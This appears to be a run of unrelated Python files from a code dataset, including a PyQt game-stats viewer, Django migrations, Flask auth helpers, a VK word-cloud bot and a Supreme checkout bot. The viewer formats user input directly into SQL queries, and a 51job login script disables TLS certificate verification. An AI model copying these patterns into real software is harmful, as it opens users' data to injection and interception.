# defer.DeferredList(dfs).addBoth(lambda _: reactor.stop())
# reactor.run() # the script will block here until all crawling jobs are finished
# runner = CrawlerRunner(get_project_settings())
#
# @defer.inlineCallbacks
# def crawl():
# for domain in range(2):
# yield runner.crawl('JumpReport')
# reactor.stop()
#
# crawl()
# reactor.run() # the script will block here until the last crawl call is finished
# settings = Settings({'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'})
# runner = CrawlerRunner(settings)
#
# d = runner.crawl(JumpReport)
# d.addBoth(lambda _: reactor.stop())
# reactor.run() # the script will block here until the crawling is finished
# runner = CrawlerProcess(get_project_settings())
# runner.crawl(JumpReport)
# runner.start()
name = self.qle.text()
db = db_handle()
with db as con:
sql = "select * from player where name = '{}' order by update_time".format(name)
con.execute(sql)
player = con.fetchone()
if player:
id, name, win, match_count, strength, level, update_time, rank = player
text = "角色名: {}\n胜场: {}\n总场数: {}\n团分: {}\n团分排行: {}\n等级: {}\n更新时间: {}".format(
name, win, match_count, strength, rank, level, update_time)
self.txt.setText(text)
sql = "select * from player_data where name = '{}' order by date".format(name)
con.execute(sql)
player_data = con.fetchall()
a = ""
for data in player_data:
a += str(data)
a += "\n"
self.battle.setText(str(a))
sql = "select * from game_data order by match_id desc"
con.execute(sql)
game_data = con.fetchall()
a = ""
l = 0
self.battle_table.setRowCount(len(game_data))
for data in game_data:
a += str(data[1:])
print(type(data))
for i in range(self.battle_table.columnCount()):
item = QTableWidgetItem(str(data[i + 1]))
# 设置填入数据的排列位置(左右居中| 上下居中)
item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)
self.battle_table.setItem(l, i, item)
a += "\n"
self.player_status.setText(str(a))
l += 1
#for i in range(len(list(a))):
# self.battle_table.setLayout(str(a))
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', "Quit?", QMessageBox.Yes | QMessageBox.No, QMessageBox.Yes)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
class BatterReport(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.txt = QTextEdit()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
|
2,912 | 34947b7ed300f2cbcbf9042fee3902458921d603 | a = list(range(1,501))
b = list(range(1,501))
c = list(range(1,501))
for i in a:
for j in b:
for k in c:
if i+k+j == 1000 and i<j<k and j**2+i**2==k**2 :
print(i)
print(j)
print(k)
break
|
2,913 | 6e56c7792d88385cc28c48a7d6dd32b9d6917c64 | # Generated by Django 2.1.7 on 2019-03-24 07:08
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('adminsite', '0005_auto_20190324_0706'),
]
operations = [
migrations.RenameField(
model_name='district',
old_name='District',
new_name='district',
),
]
|
2,914 | fab3e524edf6783775fabf402f9148bf31ac06d6 | import smtplib
from email.message import EmailMessage
from functools import wraps
from threading import Thread
import flask_login
from flask import flash, current_app
from togger import db
from togger.auth.models import User, Role
from togger.calendar.models import Calendar
def get_user(username):
if username is None:
return
user = User.query.filter(User.username == username).first()
return user
def get_user_by_id(id):
if id is None:
return
user = User.query.filter(User.alias_id == id).first()
return user
def add_user(username, password, first_name, last_name):
if username is None or password is None:
return
calendar = Calendar(name=username)
role = Role(type=Role.OWNER, calendar=calendar, is_default=True)
user = User(username=username, first_name=first_name, last_name=last_name, roles=[role])
user.set_password(password)
verify_email(user)
db.session.add(user)
db.session.commit()
return user
def update_user(first_name, last_name):
user = flask_login.current_user
user.first_name = first_name
user.last_name = last_name
db.session.merge(user)
db.session.commit()
return True
def verify_email(user):
token = user.generate_validate_token()
url = current_app.config['APP_URL'] + "/auth/verify/" + token
subject = "[Togger] Welcome to Togger. Verify your email"
prepare_email(user.username, subject, url)
def restore_password(token, new_password):
user = User()
if user.check_password_token(token):
user = get_user(user.username)
user.set_password(new_password)
db.session.merge(user)
db.session.commit()
flask_login.login_user(user, remember=True)
return True
else:
flash("Restoration link got expired. Please request a new one.", 'danger')
return False
def password_email(username):
user = get_user(username)
if user and user.is_verified:
token = user.generate_password_token()
url = current_app.config['APP_URL'] + "/auth/restore/" + token
subject = "[Togger] Forgot your password? The restoration link is inside"
prepare_email(user.username, subject, url)
def prepare_email(address, subject, content):
thread = Thread(target=send_email,
args=(address, subject, content, current_app.config,))
thread.daemon = True
thread.start()
def send_email(username, subject, content, config):
msg = EmailMessage()
msg.set_content(content)
msg['Subject'] = subject
msg['From'] = config['SMTP_MAILBOX']
msg['To'] = username
s = smtplib.SMTP(config['SMTP_SERVER'], config['SMTP_PORT'])
s.login(config['SMTP_LOGIN'], config['SMTP_PASSWORD'])
s.send_message(msg)
s.quit()
def confirm_verify_email(token):
user = User()
if user.check_validate_token(token):
user = get_user(user.username)
user.is_verified = True
db.session.merge(user)
db.session.commit()
else:
flash('Verification link got expired. Please request a new one.', 'danger')
def change_password(old_password, new_password):
if flask_login.current_user.check_password(old_password):
flask_login.current_user.set_password(new_password)
db.session.merge(flask_login.current_user)
db.session.commit()
flash('Password was changed. Please sign in using new password.', 'success')
return True
flash('Current password is incorrect.', 'danger')
return False
def get_roles():
try:
return flask_login.current_user.roles
except AttributeError:
return []
def get_role():
for role in get_roles():
if role.is_default:
return role
return None
def has_role(role_type):
def decorator(function):
@wraps(function)
def wrapper(*args, **kwargs):
role = get_role()
if role and role.type >= role_type:
result = function(*args, **kwargs)
else:
result = current_app.login_manager.unauthorized()
return result
return wrapper
return decorator
|
2,915 | b7a8e4105f1c1c532eaae27afae14e9a4f2ddfba | # Generated by Django 3.2.3 on 2021-06-19 11:27
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BillDetail',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Name', models.CharField(default=None, max_length=150)),
('CID', models.IntegerField(unique=True)),
('Units', models.PositiveIntegerField(default=None, validators=[django.core.validators.MaxValueValidator(100)])),
('Amount', models.PositiveIntegerField(default=None, validators=[django.core.validators.MaxValueValidator(100)])),
('BillGenerated', models.DateField(auto_now_add=True)),
],
),
]
|
2,916 | 44cbe1face91d3ac7edcd93d0b470bce90c8b674 | # myapp/serializers.py
from rest_framework import serializers
from rest_framework.authtoken.models import Token
from .models import *
# Serializers define the API representation.
class GeneralSerializer(serializers.ModelSerializer):
class Meta:
model = None
fields = '__all__'
class V2OfUsersSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = V2OfUsers
fields = ('firstname', 'lastname', 'username', 'email', 'password')
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User(
email=validated_data['email'],
username=validated_data['username']
)
user.set_password(validated_data['password'])
user.save()
Token.objects.create(user=user)
return user
class MeasurementsSerializer(serializers.ModelSerializer):
class Meta:
model = Measurements
fields = '__all__'
def __init__(self, *args, **kwargs):
super(MeasurementsSerializer, self).__init__(*args, **kwargs)
request = self.context.get("request")
if request and request.query_params.get('fields'):
fields = request.query_params.get('fields')
if fields:
fields = fields.split(',')
allowed = set(fields)
existing = set(self.fields.keys())
for field_name in existing - allowed:
self.fields.pop(field_name)
# Serializer for Counting Providers
# and Network Type e.g 2G, 3G, 4G
class CountSerializer(serializers.Serializer):
key = serializers.CharField(max_length=20)
value = serializers.IntegerField()
# Serializer for Mobile Operating System
class OperatingSystemSerializer(serializers.ModelSerializer):
value = serializers.CharField(max_length=30)
key = serializers.CharField(source='versionname', max_length=30)
class Meta:
model = Measurements
fields = ('key', 'value')
# Serializer for Vendors
class VendorsSerializer(serializers.ModelSerializer):
value = serializers.CharField(max_length=30)
key = serializers.CharField(source='devicemanufacturer', max_length=30)
class Meta:
model = Measurements
fields = ('key', 'value')
# General Serializer for DownLink and UpLink for all
# Providers and Network Types with date range parameters
class GlobalSerializer(serializers.Serializer):
key = serializers.CharField(max_length=20)
avg = serializers.IntegerField()
min = serializers.IntegerField()
max = serializers.IntegerField()
|
2,917 | 2a37d02c7a0840e855a80adced4794fd757e353a | import ssl
import urllib
from urllib import request, response, error, parse, robotparser
context = ssl._create_unverified_context()
url = 'https://oauth.51job.com/get_login.php?client_id=000001&redirect_uri=https%3A%2F%2Funion.yingjiesheng.com%2Fapi_login.php&from_domain=yjs_web&display=default&state=7c893ec1be7b355a91bdc3c474087add--368ba30db1d6217cc18f7dfe0bd27a79&partner='
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'
}
data = {
'loginname_encrypt': '/Pjp1Ki1S3j65+QC2J2pkg==',
'password_encrypt': 'hiqxe1qVXCoVuCrSwYM+eg=='
}
data = bytes(parse.urlencode(data), 'utf-8')
req = request.Request(url, data=data, headers=headers, method='POST')
res = request.urlopen(req, context=context)
print(res.read().decode('utf-8')) |
2,918 | 5433e75bdc46d5a975969e7ece799174dc9b8713 | # # 8/19/2020
# Of course, binary classification is just a single special case. Target encoding could be applied to any target variable type:
# For binary classification usually mean target encoding is used
# For regression mean could be changed to median, quartiles, etc.
# For multi-class classification with N classes we create N features with target mean for each category in one vs. all fashion
# The mean_target_encoding() function you've created could be used for any target type specified above. Let's apply it for the regression problem on the example of House Prices Kaggle competition.
# Your goal is to encode a categorical feature "RoofStyle" using mean target encoding. The train and test DataFrames are already available in your workspace.
# Create mean target encoded feature
train['RoofStyle_enc'], test['RoofStyle_enc'] = mean_target_encoding(train=train,
test=test,
target='SalePrice',
categorical='RoofStyle',
alpha=10)
# Look at the encoding
print(test[['RoofStyle', 'RoofStyle_enc']].drop_duplicates())
# <script.py> output:
# RoofStyle RoofStyle_enc
# 0 Gable 171565.947836
# 1 Hip 217594.645131
# 98 Gambrel 164152.950424
# 133 Flat 188703.563431
# 362 Mansard 180775.938759
# 1053 Shed 188267.663242
|
2,919 | db159cfb198311b0369f65eb9e10947c4d28c695 | #finding optimal betting strategy for the blackjack game using Monte Carlo ES method
import random
class Player():
def __init__(self) -> None:
q = None
policy = None
returns = None
cards = 0
dealer = 0
def hit(self):
self.cards += random.randint(1,11)
def deal(self):
self.cards = random.randint(1,11) + random.randint(1,11)
self.dealer = random.randint(1,11)
def stick(self):
pass
def reset(self):
self.dealer = 0
self.cards = 0
def episode(self):
self.reset()
self.deal()
#take action based on policy
#Initialize, for all s ∈ S, a ∈ A(s):
#Q(s, a) ← arbitrary
#π(s) ← arbitrary
#Returns(s, a) ← empty list
#Repeat forever:
#Choose S0 ∈ S and A0 ∈ A(S0) s.t. all pairs have probability > 0
#Generate an episode starting from S0, A0, following π
#For each pair s, a appearing in the episode:
#G ← return following the first occurrence of s, a
#Append G to Returns(s, a)
#Q(s, a) ← average(Returns(s, a))
#For each s in the episode:
#π(s) ← argmaxa Q(s, a)
if __name__=="__main__":
pass
|
2,920 | 6a4585e0e2f5ebbd0f9a7fa203f76bb88ff9c2a0 | from django.apps import AppConfig
class ProjectrolesConfig(AppConfig):
name = 'projectroles'
|
2,921 | 50a5d3431693b402c15b557357eaf9a85fc02b0b | # -*- coding: utf-8 -*-
import sys, io,re
import regex
from collections import defaultdict
import datetime
import json
def update_key(data_base, url,kkey):
keys_saved = regex.get_data('<key>\s(.+?)\s<',data_base[url]['key'])
if kkey not in keys_saved:
data_base[url]['key'] = data_base[url]['key'][:-1]
data_base[url]['key'] += ' <key> ' + kkey + ' <\key>\n'
return True
return False
def check_date(data_base,key_word):
date = 0
for url in data_base:
for key in data_base[url]:
if key_word == key:
try:
d = int(re.sub(r'-', '', data_base[url][key]))
if date < d:
date = d
except ValueError:
continue
if date != 0:
date = str(date)
year = int(date[0:4])
if date[4] != '0':
month = int(date[4:6])
elif date[4] == '0':
month = int(date[5])
if date[6] != '0':
day = int(date[6:8])
elif date[6] == '0':
day = int(date[7])
date = (datetime.date(year, month, day) - datetime.timedelta(1)).isoformat()
return int(re.sub(r'-', '', date))
else:
return 0
def load_keywords_info():
try:
with open('keywords.json', 'r') as fp:
data = json.load(fp)
return data
except json.decoder.JSONDecodeError:
return defaultdict(str)
def save_keywords_info(data):
with open('keywords.json', 'w') as fp:
json.dump(data, fp)
def load_url_info():
try:
with open('urls.json', 'r') as fp:
data = json.load(fp)
return data
except json.decoder.JSONDecodeError:
return defaultdict(list)
def save_url_info(data):
with open('urls.json', 'w') as fp:
json.dump(data, fp)
def load_previous(data_base):
previous = []
try:
file = open("news.bank","r",encoding='utf8');
for line in file:
previous.append(line)
i = 0
while i < len(previous):
url = regex.get_data('>\s(.+?)\s<',previous[i+4])[0]
key = regex.get_data('>\s(.+?)\s<',previous[i+1])[0]
#date = regex.get_data('>\s(.+?)\s<',previous[i+5])[0]
data_base[key].append(url)
#data_base[url][key] = date
#data_base[url] = defaultdict(str)
#data_base[id]['id'] = previous[i]
#data_base[key]['key'] = previous[i]
#data_base[url]['title'] = previous[i+1]
#data_base[url]['source'] = previous[i+2]
#data_base[url]['url'] = previous[i+3]
#data_base[url]['date'] = previous[i+4]
#data_base[url]['author'] = previous[i+5]
#data_base[url]['content1'] = previous[i+6]
#data_base[url]['content2'] = previous[i+7]
i += 10
except FileNotFoundError:
pass
def check_last_update(url,date):
count = 0
for u in url:
d = regex.get_data('\S+\/(\d+\/\d+\/\d+)\S+',u)[0]
d = int(re.sub(r'/', '', d))
if d < date:
return count
count += 1
return -1
def MinEditDist(s1, s2):
if len(s1) > len(s2):
s1, s2 = s2, s1
distances = range(len(s1) + 1)
for i2, c2 in enumerate(s2):
distances_ = [i2+1]
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1])
else:
distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])))
distances = distances_
return distances[-1]
|
2,922 | c6fd848bb3d845a50b928c18a51f296a500e7746 | import socket
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 8886)
sock.connect(server_address)
data = "TCP"
length = len(data)
ret = bytearray([])
for byte in data.encode("utf-8"):
ret.append(byte)
sock.sendall(ret)
if __name__ == '__main__':
main()
|
2,923 | ccedca543fc4dee284a9243317d028ffdeac229d | import pandas
import numpy as np
train_set = pandas.read_csv("./dataset/train.csv")
test_set = pandas.read_csv("./dataset/test.csv")
print(train_set)
train_set = train_set.drop('id',axis=1)
print(train_set.describe())
train_set['type'], categories = train_set['type'].factorize()
import matplotlib.pyplot as plt
print(train_set.info())
'''
fig = plt.figure(figsize=(10,5))
ax = fig.add_subplot(111)
cax = ax.matshow(train_set.corr())
fig.colorbar(cax)
ax.set_xticklabels(train_set.columns)
ax.set_yticklabels(train_set.columns)
plt.show()'''
X_train = train_set.drop('type',axis=1)
y_train = train_set.get('type')
X_train= X_train.append(test_set)
#print(X_train.info())
from sklearn.base import BaseEstimator, TransformerMixin
class CreateExtraFeatures(BaseEstimator,TransformerMixin):
def __init__(self):pass
def fit(self,X,y=None):
return self
def transform(self,X,y=None):
X['hair_soul'] = X['hair_length'] * X['has_soul']
X['flesh_soul'] = X['rotting_flesh'] * X['has_soul']
return np.c_[X]
class DataFrameSelector(BaseEstimator, TransformerMixin):
def __init__(self, attribute_names):
self.attribute_names = attribute_names
def fit(self, X, y=None):
return self
def transform(self, X):
return X[self.attribute_names]
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
num_attributes = ["bone_length","rotting_flesh","hair_length","has_soul"]
cat_attributes = ["color"]
pipeline_num = Pipeline([
("selector",DataFrameSelector(num_attributes)),
("extra_feat",CreateExtraFeatures())
])
pipeline_cat = Pipeline([
("selector", DataFrameSelector(cat_attributes)),
("categorical_encoder", OneHotEncoder(sparse=False))
])
from sklearn.pipeline import FeatureUnion
full_pipeline = FeatureUnion([
("pip,num",pipeline_num),
("pip_cat",pipeline_cat)
])
X_train= full_pipeline.fit_transform(X_train)
X_test = X_train[371:]
X_train = X_train[:371]
from sklearn.neural_network import MLPClassifier
nn_clf = MLPClassifier(max_iter=3000)
from sklearn.model_selection import GridSearchCV
grid_params = [{"hidden_layer_sizes":range(3,20), "activation":['identity', 'logistic', 'tanh', 'relu'], "solver":["lbfgs","sgd","adam"],"learning_rate":["adaptive"]}]
grid_search = GridSearchCV(nn_clf,param_grid=grid_params,cv=3,verbose=3, n_jobs=-1)
grid_search.fit(X_train,y_train)
print(grid_search.best_estimator_)
print(grid_search.best_score_)
#X_test = full_pipeline.fit_transform(test_set[num_attributes],test_set[cat_attributes].values)
y_pred = grid_search.predict(X_test)
submissions = pandas.DataFrame(y_pred, index=test_set.id,columns=["type"])
submissions["type"] = categories[submissions["type"]]
submissions.to_csv('submission.csv', index=True)
|
2,924 | 03ce69924c885e59e40689dc63e50d54b89649f7 | import _thread
import os
from queue import Queue
from threading import Thread
import random
import io
import vk_api
from vk_api.longpoll import VkLongPoll, VkEventType
from datetime import datetime, timedelta
import time
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from wordcloud import WordCloud
import pymorphy2
from pymongo import MongoClient
import config
import matplotlib
matplotlib.use('Agg')
print('Connecting to VK...', end=' ')
vk_group_session = vk_api.VkApi(token=config.vk_community_token)
vk_group = vk_group_session.get_api()
vk_session = vk_api.VkApi(token=config.vk_user_token)
tools = vk_api.VkTools(vk_session)
vk = vk_session.get_api()
vk_upload = vk_api.VkUpload(vk_session)
print('Done')
print('Connecting to MongoDB...', end=' ')
collection = MongoClient(config.mongo_host)[config.mongo_db]['photos']
print('Done')
remove_words = ['год']
DIR = os.path.dirname(__file__)
processing = []
current_year = datetime.now().year - 1 if datetime.now().month != 12 else datetime.now().year
def cloud(user_id):
wall = tools.get_all('wall.get', 100, {'owner_id': user_id})['items']
wall = list(filter(lambda x: datetime.fromtimestamp(x['date']).year == current_year, wall))
tokenizer = RegexpTokenizer('[а-яА-ЯёЁ]+')
morph = pymorphy2.MorphAnalyzer()
def transform(sentence):
return map(lambda x: morph.parse(x)[0].normal_form.replace('ё', 'е'),
filter(
lambda x: len(x) > 2 and 'NOUN' in morph.parse(x)[0].tag,
tokenizer.tokenize(sentence.replace('\xa0', ' '))
)
)
top_words = []
for post in wall:
if 'text' in post:
top_words.extend(transform(post['text']))
if 'copy_history' in post:
for copy in post['copy_history']:
if 'text' in copy:
top_words.extend(transform(copy['text']))
top_words = list(filter(lambda x: x.lower() not in remove_words, top_words))
if not top_words:
return
# def color_func(word, font_size, position, orientation, random_state=None, **kwargs):
# return "hsl(%d, 100%%, %d%%)" % (random.randint(0, 360), random.randint(20, 50))
def color_func(word, font_size, position, orientation, random_state=None, **kwargs):
return "rgb(0, 0, 0)"
sw = (stopwords.words('russian') + stopwords.words('english') + remove_words)
wordcloud = WordCloud(
max_words=50,
max_font_size=500,
background_color='white',
margin=5,
width=1000,
height=1000,
stopwords=sw,
prefer_horizontal=0.7,
font_path='font.ttf'
).generate(' '.join(top_words).lower())
wordcloud = wordcloud.recolor(color_func=color_func, random_state=3).to_image()
img_arr = io.BytesIO()
wordcloud.save(img_arr, format='PNG')
img_arr.seek(0)
return img_arr, wall, top_words
def send_cloud(user_id, message, send=True):
if user_id in processing:
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message=f'Подожди, я составляю твое облако тегов')
return
if message.lower() != 'облако':
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message=f'Если ты хочешь получить свое облако тегов за {current_year} '
'год, отправь мне слово "облако" без кавычек 🙃')
return
processing.append(user_id)
print('Generating cloud for', user_id)
try:
# if not vk.groups.isMember(group_id=config.group_id, user_id=user_id):
# vk_group.messages.send(user_id=user_id,
# random_id=random.randint(0, 99999999),
# message='Чтобы составить облако тегов, '
# 'подпишись на меня https://vk.com/wwcloud 🙄')
# time.sleep(1)
# vk_group.messages.send(user_id=user_id,
# random_id=random.randint(0, 99999999),
# message='Когда будешь готов, снова отправь кодовое слово "облако" 😊')
# processing.remove(user_id)
# time.sleep(5)
# return
if len(vk.wall.get(owner_id=user_id, count=1)['items']) == 0:
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message='Похоже, у тебя недостаточно записей на стене '
'для составления облака тегов☹️')
processing.remove(user_id)
print('Removed (1) cloud from processing for', user_id)
time.sleep(5)
return
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message=f'Посмотрим, что тебя интересовало в {current_year} году больше всего 😋')
user = vk.users.get(user_ids=user_id)[0]
user_id = user['id']
name = user['first_name'] + ' ' + user['last_name']
clouded = cloud(user_id)
if not clouded:
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message='Похоже, у тебя недостаточно записей на стене '
'для составления облака тегов ☹️')
processing.remove(user_id)
print('Removed (2) cloud from processing for', user_id)
time.sleep(5)
return
clouded, wall, top_words = clouded
photo = vk_upload.photo(
clouded,
album_id=config.album_id,
group_id=config.group_id
)[0]
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999), message='А вот и твое облако тегов! 🌍',
attachment='photo{}_{}'.format(photo['owner_id'], photo['id']))
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999), message='Не забудь поделиться с друзьями 😉')
post_id = None
if len(top_words) > 100:
try:
post_id = vk.wall.post(owner_id='-{}'.format(config.group_id), from_group=1,
message='Облако тегов для *id{}({})'.format(user_id, name),
attachments='photo{}_{}'.format(photo['owner_id'], photo['id']))['post_id']
except Exception as e:
processing.remove(user_id)
print(e)
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message='Похоже, я превысил лимит количества постов на сегодня 😭')
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
message='Создай новое облако завтра, и я выложу его на стену группы 😎')
print('Removed (3) cloud from processing for', user_id)
if post_id:
# collection.insert({
# 'user_id': user_id,
# 'owner_id': photo['owner_id'],
# 'id': photo['id'],
# 'post': post_id,
# 'timestamp': time.time(),
# 'length': len(top_words)
# })
if send:
vk_group.messages.send(user_id=user_id,
random_id=random.randint(0, 99999999),
attachment='wall{}_{}'.format(photo['owner_id'], post_id))
# else:
# collection.insert({
# 'user_id': user_id,
# 'owner_id': photo['owner_id'],
# 'id': photo['id'],
# 'timestamp': time.time(),
# 'length': len(top_words)
# })
# if send:
# vk_group.messages.send(
# user_id=user_id,
# random_id=random.randint(0, 99999999),
# message='Кстати, у нас в группе проходит конкурс, советую принять участие 😉',
# attachment='wall-136503501_467'
# )
processing.remove(user_id)
print('Finished cloud for', user_id)
except Exception as e:
processing.remove(user_id)
print('Finished cloud for', user_id, 'with error')
raise e
def worker(q, old=False):
while True:
# Получаем задание из очереди
item = q.get()
try:
item[0](*item[1], **item[2])
except Exception:
pass
# Сообщаем о выполненном задании
q.task_done()
if __name__ == '__main__':
q = Queue()
for i in range(10):
t = Thread(target=worker, args=(q,))
t.setDaemon(True)
t.start()
print('Initializing longpoll connection...', end=' ')
longpoll = VkLongPoll(vk_group_session)
print('Done')
for event in longpoll.listen():
if event.to_me and event.type == VkEventType.MESSAGE_NEW and event.user_id not in processing:
print(event.user_id, event.text)
q.put((send_cloud, (event.user_id, event.text), {}))
q.join()
|
2,925 | eab45dafd0366af8ab904eb33719b86777ba3d65 | import random
from .action import Action
from ..transition.step import Step
from ..value.estimators import ValueEstimator
def greedy(steps: [Step], actions: [Action], value_estimator: ValueEstimator) -> int:
estimations = [value_estimator(steps, action) for action in actions]
return actions[estimations.index(max(estimations))]
def e_greedy(
steps: [Step], actions: [Action], value_estimator: ValueEstimator, e: float,
) -> int:
return (
random.sample(actions, 1)
if random.uniform(0, 1) < e
else greedy(steps, actions, value_estimator)
)
|
2,926 | 56157aaf3f98abc58572b45111becb91cb93f328 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-24 11:30
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Employee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(blank=True, max_length=30, null=True)),
('last_name', models.CharField(blank=True, max_length=30, null=True)),
('gender', models.CharField(blank=True, max_length=10, null=True)),
('email', models.EmailField(blank=True, max_length=255, null=True)),
('phone_number', models.CharField(blank=True, max_length=20, null=True)),
('address', models.TextField(blank=True, max_length=255, null=True)),
('city', models.CharField(blank=True, max_length=50, null=True)),
('state', models.CharField(blank=True, max_length=50, null=True)),
('post_code', models.CharField(blank=True, max_length=10, null=True)),
('comment', models.TextField(blank=True, max_length=255, null=True)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(blank=True, max_length=100, null=True)),
('item_name', models.CharField(blank=True, max_length=100, null=True)),
('catagory', models.CharField(blank=True, max_length=100, null=True)),
('wholesale_price', models.FloatField(blank=True, null=True)),
('retail_price', models.FloatField(blank=True, null=True)),
('tax', models.FloatField(blank=True, null=True)),
('quantity_stock', models.IntegerField(blank=True, null=True)),
('receiving_quantity', models.IntegerField(blank=True, null=True)),
('description', models.TextField(blank=True, max_length=1000, null=True)),
('image', models.ImageField(blank=True, default='no-img.jpg', null=True, upload_to='item/')),
('item_has_serial_number', models.BooleanField(default=False)),
('reorder_level', models.CharField(blank=True, max_length=10, null=True)),
],
),
migrations.CreateModel(
name='Customer',
fields=[
('employee_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='account.Employee')),
],
bases=('account.employee',),
),
migrations.CreateModel(
name='Supplier',
fields=[
('employee_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='account.Employee')),
('company_name', models.CharField(blank=True, max_length=100, null=True)),
],
bases=('account.employee',),
),
migrations.AddField(
model_name='item',
name='supplier',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='account.Supplier'),
),
]
|
2,927 | b5581be044013df9ff812f285f99ca67c4f96a62 | import requests
import json
def get():
market = 'Premium'
url = 'https://coinpremiums.herokuapp.com/json'
try:
result = ""
premiums = requests.get(url).json()
for exchange, exchange_currencies in premiums['premium'].items():
result += '[[{} | '.format(exchange.title())
_sum = 0
_cnt = 0
for currency_name, currency in exchange_currencies.items():
premium = currency['raw'] - 1
result += '[{}] {:.2%} '.format(currency_name.upper(), premium)
_cnt += 1
_sum += premium
result += '[평균] {:.2%} ]] '.format(_sum / _cnt)
except Exception as e:
result = '[{market}] 에러! : {msg}'.format(market=market, msg=e.__repr__())
return result
|
2,928 | 6a6a7cc6d4f601f4461488d02e03e832bc7ab634 | """ quiz materials for feature scaling clustering """
# FYI, the most straightforward implementation might
# throw a divide-by-zero error, if the min and max
# values are the same
# but think about this for a second--that means that every
# data point has the same value for that feature!
# why would you rescale it? Or even use it at all?
from __future__ import division
data = [115, 140, 175]
def featureScaling(arr):
x_max = max(*arr)
x_min = min(*arr)
if (x_max == x_min):
return None
return map(lambda x: (x - x_min)/(x_max - x_min), arr)
# tests of your feature scaler--line below is input data
print featureScaling(data)
|
2,929 | 8fed95cf809afca7b6008d5abcdcf697367a33c2 | """
Supreme bot????
"""
import os
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
import selenium.webdriver.support.expected_conditions as EC
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
path_to_chromedriver = '/Users/Alan/Desktop/Github/SupremeBot/chromedriver'
url = "https://www.supremenewyork.com/shop/new"
path_to_log = '/Users/Alan/Desktop/'
log_errors = open(path_to_log + 'log_errors.txt', mode = 'w')
userProfile = "C:/Users/Alan/AppData/Local/Google/Chrome/User Data"
chop = webdriver.ChromeOptions()
chop.add_argument("user-data-dir=C:/Users/Alan/AppData/Local/Google/Chrome/User Data")
def initDriver():
driver = webdriver.Chrome(executable_path=path_to_chromedriver, chrome_options=chop)
driver.get(url)
return driver
def buyItem(theDriver):
try:
#Item you're trying to buy
item = theDriver.find_element_by_xpath('//*[@id="container"]/article[44]/div/a').click()
except TimeoutException:
log_errors.write('Couldn\'t locate item' + '\n')
def addCart(theDriver):
try:
print "Adding to Cart..."
addCart = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.NAME, 'commit')))
print addCart.get_attribute("value")
addCart.click()
except TimeoutException:
print "Sold out!"
log_errors.write('Sold out' + '\n')
def checkout(theDriver):
try:
print "Checking out..."
checkout = WebDriverWait(theDriver, 120).until(EC.element_to_be_clickable((By.XPATH, '//*[@id="cart"]/a[2]')))
time.sleep(.25)
checkout.click()
except TimeoutException:
print "Rip!"
log_errors.write('Error' + '\n')
def fillInfo(theDriver):
try:
print "Entering info..."
except TimeoutException:
print "Error filling info"
def readAndAgree(theDriver):
try:
print "Clicking agree..."
#agree = theDriver.find_elements_by_css_selector('.iCheck-helper')
#agree[1].click()
agree = WebDriverWait(theDriver, 120).until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.iCheck-helper')))
agree[1].click()
except TimeoutException:
print "Not found"
def main():
print "Bot running"
driver = initDriver()
buyItem(driver)
addCart(driver)
checkout(driver)
readAndAgree(driver)
while True:
time.sleep(50)
if __name__ == '__main__':
main()
print "Finished"
|
2,930 | 8ebc11f4b9e28254ef40175b26744f2a5ab0c831 | import os
from registration import Registration
from login import Login
def login():
""" redirect to login page"""
login_page = Login()
login_page.login_main_page()
def registration():
"""Register the new user"""
registration_page = Registration()
registration_page.registration_main_page()
